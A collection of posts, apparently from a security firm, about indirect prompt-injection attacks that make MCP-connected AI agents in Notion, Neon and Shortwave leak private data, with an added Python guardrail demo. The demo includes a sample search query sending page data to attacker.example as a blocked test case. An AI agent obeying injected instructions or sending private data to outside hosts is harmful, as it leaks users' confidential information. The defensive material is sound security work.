We got @NotionHQ to leak your private Notion pages 💀
On Thursday @NotionHQ announced Notion 3.0 with support for custom agents using MCP (built by @AnthropicAI) — powerful, but dangerous.
@simonw calls these MCP-related attacks the “lethal trifecta”: the combination of LLMs, tool access, and persistent memory.
Notion’s web-search tool accepts freeform queries as input. With a simple indirect prompt injection we tricked the web-search tool into exfiltrating private Notion pages to an attacker-controlled server.
Now that Notion supports MCPs, prompt injections can come from many sources (GitHub, Jira, email, etc.). Adding AI agents to Notion poses a major security risk: all it takes is one prompt injection for private data to leak.
Read the writeup: https://t.co/zGGUJoPOY0
#makewithnotion
Runtime guardrails like https://t.co/6PVm5uV3nY work at the tool-invocation level to block tool calls at the input or output phase. Guardrails can be written to block tool calls based on expressive combinations of bad input params, output results and known malicious tool-call sequences in a lightweight Pythonic DSL.
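The two posts above describe the attack shape (an injected instruction makes the agent read private pages, then smuggle their contents out through a freeform web-search query) and the defence shape (a guardrail that inspects tool calls on the way in and tool results on the way out). The following is an added example, not code from the thread, from Notion, or from the guardrail product linked above. It is a stand-alone Python interceptor with three rules: a host allowlist for URLs in search queries, taint tracking of text returned by private-page reads, and a crude sequence rule. The tool names `read_page` and `web_search`, the argument and result shapes, the allowlist, and the sample page content are all constructed for the demo.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumed policy settings for this demo (not a real product's configuration).
ALLOWED_SEARCH_HOSTS = {"notion.so", "docs.python.org"}
MAX_QUERY_LEN = 256


@dataclass
class ToolCall:
    name: str   # e.g. "read_page", "web_search" (assumed tool names)
    args: dict  # tool arguments as the agent passed them


class Guardrail:
    """Policy evaluated at tool invocation (input phase) and tool return (output phase)."""

    def __init__(self):
        self.history = []           # names of tools invoked so far in this agent run
        self.private_lines = set()  # text lines the agent has read from private pages

    # ---- output phase: remember which private data the agent has now seen ----
    def on_output(self, call: ToolCall, result: dict) -> None:
        self.history.append(call.name)
        if call.name == "read_page" and result.get("private"):
            for line in result.get("content", "").splitlines():
                line = line.strip()
                if len(line) >= 12:  # skip short lines that would match by chance
                    self.private_lines.add(line)

    # ---- input phase: decide whether a call may proceed ----
    def on_input(self, call: ToolCall) -> tuple:
        if call.name != "web_search":
            return (True, "")
        query = str(call.args.get("query", ""))

        # Rule 1: URLs in a search query may only point at allowlisted hosts,
        # which blocks "search" requests that are really beacons to an attacker server.
        for url in re.findall(r"https?://[^\s\"'<>]+", query):
            host = (urlparse(url).hostname or "").lower()
            if host not in ALLOWED_SEARCH_HOSTS:
                return (False, f"url to non-allowlisted host {host!r}")

        # Rule 2: taint tracking; a query must not carry text read from a private page.
        for line in self.private_lines:
            if line in query:
                return (False, "query embeds private page content")

        # Rule 3: sequence rule; a private read immediately followed by an oversized
        # search is a known exfiltration shape even when the payload is encoded.
        if self.history[-1:] == ["read_page"] and len(query) > MAX_QUERY_LEN:
            return (False, "oversized search right after read_page")

        return (True, "")


# Constructed sample page returned by the (simulated) read_page tool.
PRIVATE_PAGE = {
    "private": True,
    "content": "Client roadmap: Acme Corp\nSalary band: L6, 220k USD\n",
}


def simulate() -> dict:
    """Run one benign and three malicious tool calls through the guardrail."""
    g = Guardrail()
    verdicts = {}
    verdicts["benign"] = g.on_input(ToolCall("web_search", {"query": "Notion 3.0 release notes"}))
    # Agent reads a private page; the guardrail records its lines as tainted.
    g.on_output(ToolCall("read_page", {"page_id": "abc123"}), PRIVATE_PAGE)
    verdicts["url_exfil"] = g.on_input(
        ToolCall("web_search", {"query": "https://attacker.example/c?d=Acme%20L6"}))
    verdicts["taint"] = g.on_input(
        ToolCall("web_search", {"query": "what does Salary band: L6, 220k USD mean"}))
    verdicts["sequence"] = g.on_input(ToolCall("web_search", {"query": "x" * 300}))
    return verdicts


if __name__ == "__main__":
    for name, (allowed, reason) in simulate().items():
        print(f"{name:10s} allowed={allowed} {reason}")
```

Rule 3 is deliberately blunt: a length threshold will not stop an attacker who chunks the data across many small searches, so in practice the taint rule and the URL allowlist do most of the work, and the sequence rule is there to catch encoded payloads the taint rule cannot match. None of this replaces removing the tool's ability to reach arbitrary hosts in the first place.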
Hey @davidgomes, we reported the Neon MCP vulnerability and were told by the Neon team that this is an inherent issue with all MCPs with write access. Neon needs to warn customers about the massive risks of exposing customer data to threat actors via the Neon MCP - https://t.co/V6qKI9B8TT
Shortwave AI Email's MCP integration exploited: attackers exfiltrate users’ emails and other confidential data by hijacking MCPs. - https://t.co/3uK4I2MlIN
@mitsuhiko We wrote runtime guardrails on top of the Playwright MCP to constrain it to be more secure/reliable for workflows even with all its tooling - https://t.co/9JkALdYKOm
@simonw What's your opinion on DB companies now powering powerful MCPs to manage DB tasks? Our team found numerous exploits with the official Neon DB MCP where attackers can exfiltrate customer DB data - https://t.co/YXtCS4ckh6